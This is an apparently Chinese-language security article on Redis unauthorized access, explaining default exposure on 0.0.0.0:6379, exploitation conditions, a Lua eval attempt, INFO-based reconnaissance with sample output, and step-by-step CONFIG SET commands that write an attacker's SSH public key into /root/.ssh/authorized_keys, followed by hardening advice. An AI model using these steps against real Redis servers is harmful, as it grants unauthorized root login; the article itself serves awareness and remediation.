1. Redis簡(jiǎn)介
2. 漏洞概述
3. 漏洞利用方式
4. 修復(fù)方式

1. Redis簡(jiǎn)介

Redis簡(jiǎn)介

2. 漏洞概述

Redis 默認(rèn)情況下，會(huì)綁定在 0.0.0.0:6379，這樣將會(huì)將 Redis 服務(wù)暴露到公網(wǎng)上，如果在沒(méi)有開(kāi)啟認(rèn)證的情況下，可以導(dǎo)致任意用戶(hù)在可以訪問(wèn)目標(biāo)服務(wù)器的情況下未授權(quán)訪問(wèn) Redis 以及讀取 Redis 的數(shù)據(jù)。攻擊者在未授權(quán)訪問(wèn) Redis 的情況下可以利用 Redis 的相關(guān)方法，可以成功在 Redis 服務(wù)器上寫(xiě)入公鑰，進(jìn)而可以使用對(duì)應(yīng)私鑰直接登錄目標(biāo)服務(wù)器

• 0x1: 漏洞描述

Redis安全模型的觀念是: "請(qǐng)不要將Redis暴露在公開(kāi)網(wǎng)絡(luò)中, 因?yàn)樽尣皇苄湃蔚目蛻?hù)接觸到Redis是非常危險(xiǎn)的"Redis 作者之所以放棄解決未授權(quán)訪問(wèn)導(dǎo)致的不安全性是因?yàn)?/p>

1. 99.99%使用Redis的場(chǎng)景都是在沙盒化的環(huán)境中，為了0.01%的可能性增加安全規(guī)則的同時(shí)也增加了復(fù)雜性

2. 雖然這個(gè)問(wèn)題的并不是不能解決的, 但是這在他的設(shè)計(jì)哲學(xué)中仍是不劃算的
   因?yàn)槠渌苄湃斡脩?hù)需要使用Redis或者因?yàn)檫\(yùn)維人員的疏忽等原因，部分Redis 綁定在0.0.0.0:6379，并且沒(méi)有開(kāi)啟認(rèn)證(這是Redis的默認(rèn)配置)，如果沒(méi)有進(jìn)行采用相關(guān)的策略，比如添加防火墻規(guī)則避免其他非信任來(lái)源ip訪問(wèn)等，將會(huì)導(dǎo)致Redis服務(wù)直接暴露在公網(wǎng)上，導(dǎo)致其他用戶(hù)可以直接在非授權(quán)情況下直接訪問(wèn)Redis服務(wù)并進(jìn)行相關(guān)操作利用Redis自身的相關(guān)方法，可以進(jìn)行寫(xiě)文件操作，攻擊者可以成功將自己的公鑰寫(xiě)入目標(biāo)服務(wù)器的 /root/.ssh 文件夾的authotrized_keys 文件中，進(jìn)而可以直接登錄目標(biāo)服務(wù)器

• 0x2: 漏洞利用條件

1. redis服務(wù)以root賬戶(hù)運(yùn)行
2. redis無(wú)密碼或弱密碼進(jìn)行認(rèn)證
3. redis監(jiān)聽(tīng)在0.0.0.0公網(wǎng)上

記一次Redis被攻擊的事件

3. 漏洞利用方式

• 0x1: 數(shù)據(jù)庫(kù)數(shù)據(jù)泄露

Redis 作為數(shù)據(jù)庫(kù)，保存著各種各樣的數(shù)據(jù)，如果存在未授權(quán)訪問(wèn)的情況，將會(huì)導(dǎo)致數(shù)據(jù)的泄露，其中包含保存的用戶(hù)信息等

• 0x2: 任意代碼執(zhí)行

Redis可以嵌套Lua腳本的特性將會(huì)導(dǎo)致代碼執(zhí)行

redis-cli eval "$(echo hacker /tmp/shell)" 0

0x3: 敏感信息泄露

通過(guò) Redis 的 INFO 命令, 可以查看服務(wù)器相關(guān)的參數(shù)和敏感信息, 為攻擊者的后續(xù)滲透做鋪墊

# Server
redis_version:2.8.13
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:161beea97cb9b816
redis_mode:standalone
os:Linux 2.6.32-431.23.3.el6.x86_64 x86_64
arch_bits:64
multiplexing_api:epoll
gcc_version:4.4.7
process_id:12537
run_id:977eace0aacf7c702db5ff0b689cf23cf0936dbc
tcp_port:6379
uptime_in_seconds:17725
uptime_in_days:0
hz:10
lru_clock:4493657
config_file:

# Clients
connected_clients:1
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0

# Memory
used_memory:810968
used_memory_human:791.96K
used_memory_rss:2359296
used_memory_peak:810968
used_memory_peak_human:791.96K
used_memory_lua:36864
mem_fragmentation_ratio:2.91
mem_allocator:jemalloc-3.6.0

# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1447333284
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:1
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok

# Stats
total_connections_received:5
total_commands_processed:5
instantaneous_ops_per_sec:0
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
evicted_keys:0
keyspace_hits:1
keyspace_misses:1
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:233

# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:10.47
used_cpu_user:7.25
used_cpu_sys_children:0.00
used_cpu_user_children:0.00

# Keyspace
127.0.0.1:6379> 
[root@iZ23er0navtZ ~]# redis-cli 
127.0.0.1:6379> auth littlehann
OK
127.0.0.1:6379> 
[root@iZ23er0navtZ ~]# redis-cli 
127.0.0.1:6379> keys *
(error) ERR operation not permitted
127.0.0.1:6379> 
[root@iZ23er0navtZ ~]# redis-cli -h 127.0.0.1 -p 6379 -a littlehann  
127.0.0.1:6379> keys *
(empty list or set)
127.0.0.1:6379> 
[root@iZ23er0navtZ ~]# clear
[root@iZ23er0navtZ ~]# redis-cli eval "$(echo hacker /tmp/shell)" 0
(error) ERR unknown command 'eval'
[root@iZ23er0navtZ ~]# redis-cli eval "$(echo hacker /tmp/shell)" 0
(error) ERR unknown command 'eval'
[root@iZ23er0navtZ ~]# redis-cli eval "$(echo hacker /tmp/shell)" 0 -a littlehann
(error) ERR unknown command 'eval'
[root@iZ23er0navtZ ~]# clear
[root@iZ23er0navtZ ~]# redis-cli 
127.0.0.1:6379> auth littlehann
OK
127.0.0.1:6379> eval "$(echo hacker /tmp/shell)" 0
(error) ERR unknown command 'eval'
127.0.0.1:6379> EVAL "$(echo hacker /tmp/shell)" 0
(error) ERR unknown command 'EVAL'
127.0.0.1:6379> info
redis_version:2.4.10
redis_git_sha1:00000000
redis_git_dirty:0
arch_bits:64
multiplexing_api:epoll
gcc_version:4.4.6
process_id:12766
uptime_in_seconds:3970
uptime_in_days:0
lru_clock:30359
used_cpu_sys:0.46
used_cpu_user:0.73
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
connected_clients:1
connected_slaves:0
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
used_memory:726176
used_memory_human:709.16K
used_memory_rss:1634304
used_memory_peak:726168
used_memory_peak_human:709.15K
mem_fragmentation_ratio:2.25
mem_allocator:jemalloc-2.2.5
loading:0
aof_enabled:0
changes_since_last_save:0
bgsave_in_progress:0
last_save_time:1447334503
bgrewriteaof_in_progress:0
total_connections_received:7
total_commands_processed:4
expired_keys:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
vm_enabled:0
role:master

0x4: 上傳SSH公鑰獲得SSH登錄權(quán)限

1. 首先在本地生產(chǎn)公私鑰文件：
ssh-keygen –t rsa

2. config set dir /root/.ssh/
3. config set dbfilename authorized_keys
4. set xxxx "\n\n\nssh-rsa key_pub\n\n\n"，其中key_pub為上一步生成的公鑰，即可將公鑰保存在遠(yuǎn)端服務(wù)器，使得登錄時(shí)不需要輸入賬號(hào)與密碼

Redis未授權(quán)訪問(wèn)配合SSH key文件利用分析：ZoomEye全球最新獨(dú)家數(shù)據(jù) V2

4. 修復(fù)方式

1. redis.conf: bind 127.0.0.1
//redis本來(lái)就是作為內(nèi)存數(shù)據(jù)庫(kù)，只要監(jiān)聽(tīng)在本機(jī)即可

2. 配置認(rèn)證，也就是AUTH，設(shè)置密碼，密碼會(huì)以明文方式保存在Redis配置文件中
3. 限定可以連接Redis服務(wù)器的IP
4. 修改Redis默認(rèn)端口6379
5. 配置rename-command配置項(xiàng)"RENAME_CONFIG"，這樣即使存在未授權(quán)訪問(wèn)，也能夠給攻擊者使用config 指令加大難度 
6. 禁止使用 root 權(quán)限啟動(dòng) redis 服務(wù)

Redis未授權(quán)訪問(wèn)導(dǎo)致可遠(yuǎn)程獲得服務(wù)器權(quán)限

來(lái)源